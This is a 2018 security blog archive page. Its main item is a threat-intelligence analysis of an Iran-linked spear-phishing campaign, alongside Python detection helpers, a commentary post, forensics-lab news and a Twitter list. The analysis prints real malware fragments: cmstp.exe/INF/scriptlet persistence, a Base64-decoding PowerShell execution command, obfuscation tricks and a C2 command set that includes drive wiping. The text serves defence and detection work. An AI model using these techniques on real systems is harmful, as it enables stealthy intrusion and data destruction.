Monthly Archives: March 2018

Idle Threats Or a Harbinger of Things to Come?

According to recent reporting, a suspected nation-state hacker group with alleged ties to the Iranian government issued death threats to researchers who had detected its cyber espionage activity. The researchers were checking a server that they believed to be associated with a specific data breach when they received the message “Stop!!! I Kill You Researcher.” According to the same report, the server was apparently attached to the attackers’ command-and-control infrastructure. Active since 2015, the group known as “MuddyWaters” has been observed targeting organizations in Georgia, India, Iraq, Pakistan, Saudi Arabia, Tajikistan, Turkey, and the United States. Recently, MuddyWaters has been observed targeting oil and gas entities in the Middle East. Notably, the group is believed to employ “false flag” operations – similar to what was believed to have been done during the recent Olympics – in which it adopted some of the tactics, techniques, and procedures (TTPs) of suspected Chinese hackers to obfuscate the group’s true identity.


On the surface, the threat made against the researchers can be viewed as a knee-jerk reaction to being tracked by the private sector. But it does raise the question of what hostile actors may resort to in the future. The private-sector computer security industry has been aggressively investigating the activities of suspected nation-state actors since 2004, when the first report on the activities of a Chinese state entity was published. Since that time, several subsequent public reports have detailed the TTPs and targeting of “advanced persistent threat” operations that were ultimately attributed to specific nation-state actors. While the standard public reaction of these governments has been to refute or deny the claims, citing the difficulty of providing adequate evidence to support attribution, sanctions and alleged retaliatory strikes have been known to occur as a result of these accusations.


The potential for escalatory cyber strikes in response to such actions is a real concern, and one that has been raised in the press. One reason the United States, for example, has not retaliated against suspected Russian involvement in the 2016 U.S. presidential election is not knowing how such an adversary might reciprocate a retaliatory strike against its interests. This is a very legitimate concern, as cyberspace activities are still relatively new, and nation states around the world are eagerly trying to buy, develop, or otherwise acquire an offensive cyber capability.


And this is where thinking may be too narrowly focused. A state or non-state entity does not have to resort to cyberspace to retaliate against an attack that it has suffered in cyberspace. It is not a one-for-one arrangement. Threatening to retaliate in the physical world provides another potential attack vector that needs to be considered. After all, many of the vendor APT reports that are published contain the names of those involved in writing the report – individuals who likely have a footprint on the Internet. These attackers can find their personally identifiable information (PII) and either post it for others to target or use it for their own purposes. Doxxing – disclosing the PII of victims – has long been a weapon in the hacktivist arsenal. In 2016, the United Cyber Caliphate published “kill lists” of U.S. military personnel to encourage ISIS sympathizers and lone wolves to commit acts of violence against them. Although to date there is no known attack resulting from disclosures such as this, it bears watching whether that may transpire in the future.


Nation states have been suspected of carrying out physical attacks on specific individuals. Recently, a Russian spy is believed to have been poisoned at the behest of the Russian government. In 2017, suspected North Korean agents used poison on Kim Jong Un’s brother at a Malaysian airport. Granted, these attacks weren’t the result of cyber activity, but they do demonstrate that the capability is there if the intent is present. Given that Iran is widely considered the world’s leading nation-state supporter of terrorism, it has a large network of agents to call upon to target individuals it may view as threatening to its interests. Iran has been suspected of conducting “assassinations” in the past, a claim that it has denied.


For the time being, this appears to be a one-time threat. But how nation states respond to cyber attacks and significant cyber incidents can influence what accused governments may do in response to any retaliation. Let’s hope that this confluence between cyberspace and the physical world remains theoretical and is not a harbinger of things to come.


This is a guest post written by Emilio Iasiello

The post Idle Threats Or a Harbinger of Things to Come? appeared first on cyberdb.co.

EGYPT LAUNCHES NEW DIGITAL FORENSICS LAB



IN BRIEF: The Government of Egypt has announced that it is setting up a specialized digital forensic lab for Intellectual Property as part of its enforcement schemes of combating software piracy.

---------------------------------------

The new lab, the first of its kind in the MENA region, is mainly designed to resolve business software and internet-based piracy cases. It recovers data from digital devices in a forensically sound manner and uncovers new fraud techniques.

The latest measures applied aim to enhance investigative capabilities and ease digital forensic evidence acquisition, analysis, and reporting.

The cutting-edge techniques and latest technologies employed in the lab provide a road map for judges, prosecutors, and lawyers. The practiced procedures enable them to distinguish counterfeit products from genuine ones and manage the intellectual property and digital piracy issues at hand.

The Information Technology Industry Development Agency (ITIDA), which develops the IT industry in Egypt, hosts the lab at its premises. The agency is the executive IT arm of the Egyptian ICT ministry for enforcing IPR related to software products and databases.

“Over the last couple of years, ITIDA’s IPR office has undertaken comprehensive actions to increase IP enforcement with all the stakeholders like the economic courts; i.e., judges and prosecutors, police officers, and copyright owners,” said Dr. Mohamed Hegazy, Egypt’s IPR Office Manager.

Aiming to develop the necessary skills, the fully dedicated IPR office delivered extensive training and capacity-building programs in legal, technical and practical aspects during 2017 to more than 900 police officers, 97 journalists from the National Broadcasting Authority, 125 employees from different software companies, and 473 judges and prosecutors in the economic courts.



-------------------------------
UPDATES: I took part in the recently concluded Intelligence Strategies & Crime Prevention for Law Enforcers meeting held in South Africa. Among other things, I emphasized search warrants, chain of custody, documenting everything during a forensic investigation, and proper handling of digital evidence.
Digital evidence, by its very nature, is fragile and can be altered, damaged, or destroyed by improper handling or examination; this may render it unusable or lead to an inaccurate conclusion.
-------------------------------

“We are committed to sustaining our success in combating IP infringement and expanding IP rights. The launch of this lab enables us to achieve our targets. Only in 2017, we have delivered technical expertise reports of 96 cases to the economic courts, registered 203 computer software programs and issued 267 licenses for the first time,” Hegazy added.

According to the latest BSA-IDC Global Software Piracy Study in 2016, the Egyptian piracy rate reached 61%, a ratio lower than that of most competing countries and leading global outsourcing locations, including Morocco (65%), the Philippines (67%) and Vietnam (78%).

The Cabinet is preparing a draft data protection and privacy law. It has already agreed on a cybercrime law, which awaits Parliament’s approval to be enacted, according to Egypt’s state media.

Egypt is currently undergoing an unprecedented phase of development in all fields, which is largely attributed to sound policies, monetary reforms, and global partnerships.

With the sustained momentum that Egypt is gaining in tech innovation and startup ecosystem maturity, the Egyptian government, represented by the Ministry of ICT, put its free and open software strategy into action in 2016.

The newly adopted policy represents a paradigm shift in intellectual property rules, as it provides an alternative software-licensing model while developing a healthy ecosystem for software production and innovation.

Best Cyber Security Twitter Profiles to Follow 2018

Twitter has always been a great place to stay in touch with the latest cybersecurity trends. It is a great way to connect with professionals and even experts whom you normally wouldn’t be able to reach. You can follow them, read their posts and comments daily, and even tag them in your tweets to attract their attention in a few seconds. Twitter is an open platform that encourages people to share knowledge, from new technologies or threats to silly pictures and memes about the latest events in the news.

However, there are thousands of profiles that you can follow, and sometimes you just don’t seem to find exactly what you are looking for. The question of which security experts to follow on Twitter is tricky, since there are so many professionals out there who share valuable information and news on a daily basis. What really matters is to decide what is relevant to you and how you are going to use it to your advantage. Once you have decided whom to follow, you can create your own lists per category containing the best Cyber Security Twitter profiles. This option lets you see all of the tweets in a simple way and makes sure that you don’t miss a single tweet from your feed.

We have created a list of some of the best Twitter cybersecurity accounts so you don’t waste your time searching – you can follow them right away.

List of Best Twitter Cybersecurity Accounts You Should Follow 2018

Cybersecurity magazines and websites

  1. Infosecurity Mag

A great cybersecurity magazine that provides critical information to businesses. If you have your own business and want to keep it secure, you should definitely follow Infosecurity Mag.

  2. Security Affairs/Pierluigi Paganini

Pierluigi is the founder of this blog, which covers social network security, cyber warfare and hacktivists.

  3. The Hacker News

One of the most trusted sources of cyber security news. It is oriented to hackers, researchers, technologists and geeks. The magazine covers anything related to security on a daily basis.

  4. Hackread (HackRead.com)

This magazine brings together the best hacking, infosec, tech and social media news. A great place to learn more about cybercrime, surveillance and privacy.

  5. CSO Online

Another great cyber security platform that is a must-follow. They research various topics related to online threats that emerge on a daily basis. CSO Online mostly tweets its own content, which is excellent and professionally written.

  6. Security Week

It is a well-known news website within the cyber security industry. Security Week distinguishes itself by its editors’ more technical approach. The website’s Twitter account is updated frequently, and they always have the latest info on cyber threats.

  7. Dark Reading

An online security website made by cyber security experts and aimed at a similar audience.

  8. Help Net Security

This website has a huge contributor base coming from different industries. They give the reader a more comprehensive view of how to deal with cyber threats and issues.

  9. US-CERT

The US Computer Emergency Readiness Team helps with the fight against cybercrime and threats.

  10. Peerlyst

Peerlyst is a large community of security professionals who want to solve information security challenges together. They want to build the largest database of free security knowledge.

Cybersecurity Influencers to follow:

  1. Eugene Kaspersky

Mr. Kaspersky doesn’t need an introduction. He is one of the leaders in the industry and writes his own opinions and views on cyber security.

  2. Troy Hunt

Troy is an executive at Microsoft and deals with product security. He created HaveIBeenPwned.com, where users can check whether their e-mail addresses have been exposed in a data breach.

  3. Brian Krebs

He is a top security reporter, always on the go when the latest security breach occurs.

  4. Jeremiah Grossman

An industry expert who offers security advice to individuals and companies worldwide.

  5. Bruce Schneier

He has published many books and articles related to cyber security and has been labeled a security guru.

  6. Mikko Hypponen

One of the top researchers in the online security industry. You can find the newest types of scams and practical advice on his Twitter profile.

The post Best Cyber Security Twitter Profiles to Follow 2018 appeared first on cyberdb.co.

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign

Introduction

From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine’s IP address to achieve code execution on the system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.


Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (from Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains a Base64 encoded PowerShell command, which is decoded and executed by PowerShell using a command line generated by the VBS file when it runs under WScript.exe. The process chain is shown in Figure 2.


Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of the process tree, its final purpose remained the same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.


Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.

Infection Vector

We believe the infection vector for all of the attacks involved in this campaign is macro-based documents sent as email attachments. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:


Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. Four examples follow, and a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.


Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.


Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.


Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.


Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files into a hard coded path: C:\programdata. Since the path is hard coded, execution will only be observed on Windows 7 and above. The three files are:

  • Defender.sct – The malicious JavaScript based scriptlet file.
  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

\REGISTRY\USER\SID\Software\Microsoft\Windows\CurrentVersion\Run\"WindowsDefenderUpdater" = cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct

That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.


Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.
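As an added illustration (not FireEye's code), the following Python turns the three observable pieces of this chain into detection logic: a Run-key value that launches cmstp.exe /s against an INF under C:\ProgramData, an INF section that hands a .sct scriptlet to scrobj.dll, and powershell.exe spawned by cmstp.exe. The Run values, INF text and Sysmon-style process events it runs over are constructed samples, not real telemetry.

```python
"""Detection logic for the cmstp.exe / INF / SCT persistence chain.

Added example, not FireEye's code. Every Run value, INF and process event
below is a constructed sample, not real telemetry.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators taken from the analysis above: cmstp.exe run silently (/s) against
# an INF under C:\ProgramData, an INF section that feeds a .sct scriptlet to
# scrobj.dll, and powershell.exe decoding a Base64 .ini as a child of cmstp.exe.
CMSTP_RE = re.compile(r'(?i)(?:^|[\\\s"])cmstp(?:\.exe)?\s+(?:/s|-s)\b.*\.inf')
PROGRAMDATA_RE = re.compile(r"(?i)c:[\\/]+programdata[\\/]")
SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$", re.M)
SCROBJ_RE = re.compile(r"(?i)scrobj\.dll\s*,\s*NI\s*,\s*(\S+\.sct)")


@dataclass
class Finding:
    source: str   # where it was seen (Run value name, INF section, process pair)
    reason: str   # why it is suspicious
    detail: str   # the offending value / command line


def check_run_value(name: str, value: str) -> list[Finding]:
    """Flag an autostart (Run key) value that launches cmstp.exe silently on an INF."""
    if not CMSTP_RE.search(value):
        return []
    reason = "cmstp.exe /s used as autostart (INF-based persistence)"
    if PROGRAMDATA_RE.search(value):
        reason += "; INF stored under C:\\ProgramData"
    return [Finding(f"Run\\{name}", reason, value)]


def inf_scriptlet_sections(inf_text: str) -> list[tuple[str, str]]:
    """Return (section, sct_path) for every INF section that loads a scriptlet via scrobj.dll."""
    hits = []
    headers = list(SECTION_RE.finditer(inf_text))
    for i, hdr in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(inf_text)
        for m in SCROBJ_RE.finditer(inf_text[hdr.end():end]):
            hits.append((hdr.group(1), m.group(1)))
    return hits


def check_process(parent_image: str, image: str, cmdline: str) -> list[Finding]:
    """Flag the parent/child relationships the chain produces at logon."""
    parent = parent_image.lower().rsplit("\\", 1)[-1]
    child = image.lower().rsplit("\\", 1)[-1]
    findings = []
    if child == "cmstp.exe" and CMSTP_RE.search(cmdline):
        findings.append(Finding(f"{parent} -> {child}", "cmstp.exe /s <inf> execution", cmdline))
    if parent == "cmstp.exe" and child == "powershell.exe":
        reason = "PowerShell spawned by cmstp.exe (scriptlet stage)"
        if re.search(r"(?i)frombase64string", cmdline) and re.search(r"(?i)get-content\s+\S+\.ini", cmdline):
            reason += "; decodes a Base64 payload read from an .ini file"
        findings.append(Finding(f"{parent} -> {child}", reason, cmdline))
    return findings


# ---- constructed samples ----------------------------------------------------
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "WindowsDefenderUpdater": r"cmstp.exe /s c:\programdata\DefenderService.inf",
}

SAMPLE_INF = r"""[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct
"""

# (ParentImage, Image, CommandLine), Sysmon event 1 style
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmstp.exe",
     r"cmstp.exe /s c:\programdata\DefenderService.inf"),
    (r"C:\Windows\System32\cmstp.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString("
     r"[System.Convert]::FromBase64String((get-content C:\ProgramData\WindowsDefender.ini))))"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", r"notepad.exe readme.txt"),
]


def scan() -> list[Finding]:
    """Run all three checks over the constructed samples."""
    findings = []
    for name, value in SAMPLE_RUN_VALUES.items():
        findings += check_run_value(name, value)
    for section, sct in inf_scriptlet_sections(SAMPLE_INF):
        findings.append(Finding(f"INF [{section}]", "scrobj.dll loads a .sct scriptlet", sct))
    for parent, image, cmdline in SAMPLE_EVENTS:
        findings += check_process(parent, image, cmdline)
    return findings


if __name__ == "__main__":
    for f in scan():
        print(f"[{f.source}] {f.reason}\n    {f.detail}")
```

On a real host the same three functions can be fed the Run key values read from the registry, the INF files found under C:\ProgramData, and process creation events from Sysmon or EDR telemetry.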

SCT File Analysis

The Defender.sct file contains obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of the WindowsDefender.ini file and execute the decoded PowerShell script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini))))

The rest of the malicious activities are performed by the PowerShell Script.

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.


Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are:
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.


Figure 11: PowerShell script is XOR encoded using a single byte key
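Two of the obfuscation layers listed above can be peeled back mechanically. The following Python helpers, added here and not part of FireEye's analysis, resolve the environment-variable indexing tricks to the string they build and recover a single-byte XOR key by scoring every candidate key; the default values assumed for $env:PUBLIC and $env:COMSPEC and the XOR sample are constructed for the demo.

```python
"""Deobfuscation helpers for two of the layers described above.

Added example, not FireEye's code. The environment-variable defaults and the
XOR sample are constructed assumptions for the demo.
"""
from __future__ import annotations

import re

# Values the script indexes into, as found on an English Windows install
# (assumption; substitute the victim's actual environment when analysing).
DEFAULT_ENV = {
    "PUBLIC": r"C:\Users\Public",
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
}

ENV_INDEX_RE = re.compile(r"\$env:(\w+)\[([\d,\s]+)\]", re.I)   # $env:NAME[i] or [i,j,k]
LITERAL_RE = re.compile(r"'([^']*)'")


def resolve_env_indexing(expr: str, env: dict[str, str] = DEFAULT_ENV) -> str:
    """Rewrite $env:NAME[...] pieces and '...' literals into the string they build.

    Handles both forms seen in the script: pieces glued with '+' and the
    "$env:NAME[i,j,k] -join ''" form. If a piece cannot be resolved, the
    partially simplified expression is returned so the analyst can see it.
    """
    def sub_env(m: re.Match) -> str:
        value = env.get(m.group(1).upper())
        if value is None:
            return m.group(0)
        idxs = [int(i) for i in m.group(2).split(",") if i.strip()]
        if any(i >= len(value) for i in idxs):
            return m.group(0)
        return "'" + "".join(value[i] for i in idxs) + "'"

    s = ENV_INDEX_RE.sub(sub_env, expr)
    s = re.sub(r"\s*-join\s*''", "", s, flags=re.I).strip()   # pieces are already joined
    while s.startswith("(") and s.endswith(")"):
        s = s[1:-1].strip()
    parts = []
    for piece in s.split("+"):
        m = LITERAL_RE.fullmatch(piece.strip())
        if not m:
            return s
        parts.append(m.group(1))
    return "".join(parts)


# Multi-character PowerShell tokens; a wrong key almost never reproduces these.
PS_TOKENS = (b"function", b"$env:", b"invoke", b"-join", b"new-object", b"return", b"param(")


def recover_xor_key(data: bytes) -> tuple[int, bytes]:
    """Brute-force a single-byte XOR key, preferring printable output rich in PS tokens."""
    if not data:
        return -1, b""
    best_score, best_key, best_plain = -1.0, -1, b""
    for key in range(256):
        plain = bytes(b ^ key for b in data)
        printable = sum(32 <= c < 127 or c in (9, 10, 13) for c in plain) / len(plain)
        if printable < 0.95:
            continue                      # cannot be script text
        low = plain.lower()
        score = printable + sum(low.count(tok) for tok in PS_TOKENS)
        if score > best_score:
            best_score, best_key, best_plain = score, key, plain
    return best_key, best_plain


# ---- constructed samples ----------------------------------------------------
OBFUSCATED_IEX = [
    "$eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'",
    "($ENV:cOMsPEC[4,26,25]-jOin'')",
]
SAMPLE_PLAIN = (b'function Get-Info { $n = $env:COMPUTERNAME; $u = $env:USERNAME; '
                b'return "$n|$u" }')
SAMPLE_XOR = bytes(b ^ 0x5A for b in SAMPLE_PLAIN)    # constructed, encoded with key 0x5A


if __name__ == "__main__":
    for expr in OBFUSCATED_IEX:
        print(f"{expr:40} -> {resolve_env_indexing(expr)}")
    key, plain = recover_xor_key(SAMPLE_XOR)
    print(f"XOR key 0x{key:02X}: {plain.decode()}")
```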

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine)
  • FIlENAmePATHP = WindowsDefender.ini (file used to store PowerShell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • SYSID
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.


Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section where a message written in Chinese and hard coded in the script is printed in the case of an error while connecting to the C2 server.

The English translation for this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:


Figure 13: Concatenated and formatted data retrieved by PowerShell script

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.


Figure 14: System shut down upon discovery of security tools

  • Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:
    • If the command starts with “excel”, then it leverages the DDEInitiate method of Excel.Application to execute the code.
    • If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code.
    • If the command starts with “risk”, then execution is performed through a DCOM object.
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV


Figure 15: Disabling Microsoft Office Protected View

  • Ability to remotely reboot, shut down, or clean the system based on the command received from the C2 server, as shown in Figure 16.


Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The following table summarizes the main C2 commands supported by this PowerShell Script.

C2 Command    Purpose
reboot        Reboot the system using shutdown command
shutdown      Shut down the system using shutdown command
clean         Wipe the Drives, C:\, D:\, E:\, F:\
screenshot    Take a screenshot of the System
upload        Encrypt and upload the information from the system
excel         Leverage Excel.Application COM object for code execution
outlook       Leverage Outlook.Application COM object for code execution
risk          Leverage DCOM object for code execution

Conclusion

This activity shows us that TEMP.Zagros stays up to date with the latest code execution and persistence techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they hinder reverse engineering and also attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes


Network Indicators

List of Proxy URLs


hxxp://apobiomedix[.]ca//db_template.php

hxxp://anythinglah[.]info//db_template.php

hxxp://aniroleplay[.]net//db_template.php

hxxp://www.allcopytoners[.]com//db_template.php

hxxp://alphaobring[.]com//db_template.php

hxxp://www.galwayprimary[.]co.za//db_template.php

hxxp://alnuzha[.]org/en/db_template.php

hxxps://ancient-wisdoms[.]com//db_template.php

hxxp://amazingenergysavings[.]net//db_template.php

hxxp://gvs[.]com[.]pk/font-awesome/db_template.php

hxxp://geetransfers[.]co.za/font-awesome/db_template.php

hxxp://carlagrobler[.]co.za/components/db_template.php

hxxp://amazingashwini[.]com//db_template.php

hxxp://aminearserver[.]es//db_template.php

hxxp://lensofafrica[.]co.za//db_template.php

hxxp://greenacrestf[.]co.za/video/db_template.php

hxxp://www.tonaro[.]co.za//db_template.php

hxxp://alephit2[.]biz/kitzz/db_template.php

hxxp://lppaportal[.]org.ls//db_template.php

hxxp://alkousy[.]com//db_template.php

hxxp://ambulatorioveterinariocalusco[.]com/img/common/db_template.php

hxxp://fragranceoil[.]co.za//db_template.php

hxxp://www.eloquent[.]co.za/nweb2/db_template.php

hxxp://chrishanicdc[.]org/wpimages/db_template.php

hxxp://ahc.me[.]uk//db_template.php

hxxp://www.britishasia-equip[.]co[.]uk//db_template.php

hxxp://always-beauty[.]ch//db_template.php

hxxps://www.ancamamara[.]com/wp-admin/db_template.php

hxxp://entracorntrading[.]co.za//db_template.php

hxxp://www.alexjeffersonconsulting[.]com/wp-includes/db_template.php

hxxp://americabr[.]com.br//db_template.php

hxxp://andrew-snyder[.]net/bootstrap/db_template.php

hxxp://signsoftime[.]co.za//db_template.php

hxxp://aperta-armis[.]org//db_template.php

hxxp://absfinancialplanning[.]co.za/images/db_template.php

hxxp://charispaarl[.]co.za//db_template.php

hxxp://indlovusecurity[.]co.za//db_template.php

hxxp://alcafricandatalab[.]com//db_template.php

hxxp://amor-clubhotels[.]com//db_template.php

hxxp://mokorotlocorporate[.]com//db_template.php

hxxp://apppriori[.]com//db_template.php

hxxp://luxconprojects[.]co.za//db_template.php

hxxp://androidphonetips[.]com/wp-includes/db_template.php

hxxp://angel-seeds[.]com.ua/catalog/db_template.php

hxxp://alissanicolai[.]com/assets/db_template.php

hxxps://www.amateurastronomy[.]org//db_template.php

hxxp://aiofotoevideo[.]com//db_template.php

hxxp://www.amika.hr//db_template.php

hxxp://comfortex[.]co.za/php/db_template.php

hxxp://deepgraphics[.]co.za//db_template.php

hxxps://agiledepot[.]com//db_template.php

hxxp://almatours[.]gr//db_template.php

hxxp://analystcnwang[.]com//db_template.php

hxxp://www.malboer[.]co.za/trendy1/db_template.php

hxxp://sefikengfarm.co.ls//db_template.php

hxxp://www.antirughenaturale[.]com/wp-admin/db_template.php

hxxp://passright[.]co.za//db_template.php

hxxp://seismicfactory[.]co.za//db_template.php

hxxp://alessandroalessandrini[.]it//db_template.php

hxxps://aquabsafe[.]com//db_template.php

hxxp://amatikulutours[.]com/tmp/db_template.php

hxxp://ganitis[.]gr//db_template.php

hxxp://aleenasgiftbox[.]com/admin/db_template.php

hxxps://allusdoctors[.]com/themes/db_template.php

hxxp://alainsaffel[.]com//db_template.php

hxxp://www.ariehandomri[.]com//db_template.php

hxxp://aquaneeka[.]co[.]uk/wp-includes/db_template.php

hxxp://itengineering[.]co.za/gatewaydiamond/db_template.php

hxxp://alldomains-crm[.]com/bubblegumpopcorn[.]com/wp-admin/db_template.php

hxxp://www.albertamechanical[.]ca//db_template.php

hxxp://alchamel[.]info//db_template.php

hxxps://almokan[.]net/wp-includes/db_template.php

hxxp://jakobieducation[.]co.za//db_template.php

hxxps://arc-sec[.]net//db_template.php

hxxp://ldams[.]org.ls/supplies/db_template.php

hxxp://menaboracks[.]co.za/tmp/db_template.php

hxxp://www.getcord[.]co.za//db_template.php

hxxp://boardaffairs[.]com//db_template.php

hxxp://capetownway[.]co.za//db_template.php

hxxp://cloudhostdesign[.]com//db_template.php

hxxp://hartenboswaterpark[.]co.za/templates/db_template.php

hxxp://fccorp[.]co.za/php/db_template.php

hxxp://angar68[.]com//db_template.php

hxxp://www.dws-gov[.]co.za//db_template.php

hxxp://alwahahweb[.]com//db_template.php

hxxp://anuragcreatives[.]com//db_template.php

hxxp://embali[.]co.za//db_template.php

hxxp://albertaedmonton[.]com/widgetstyles/db_template.php

hxxp://altosdefontana[.]com//db_template.php

hxxp://airfanhydro[.]net//db_template.php

hxxps://www.alexponcet[.]com/wp-includes/db_template.php

hxxp://agropecuariavilarica[.]com.br//db_template.php

hxxps://www.amazingbuyrd[.]com/admin/db_template.php

hxxp://cdxtrading[.]co.za//db_template.php

hxxp://interafricaconsulting[.]com/wpimages/db_template.php

hxxp://glgroup[.]co.za/images/db_template.php

hxxp://hisandherskennels[.]co.za/php/db_template.php

hxxp://alemaohost[.]com/lotosorg[.]com/db_template.php

hxxp://isibaniedu[.]co.za/admin/db_template.php

hxxp://dianakleyn[.]co.za/layouts/db_template.php

hxxp://themotoringcalendar[.]co.za//db_template.php

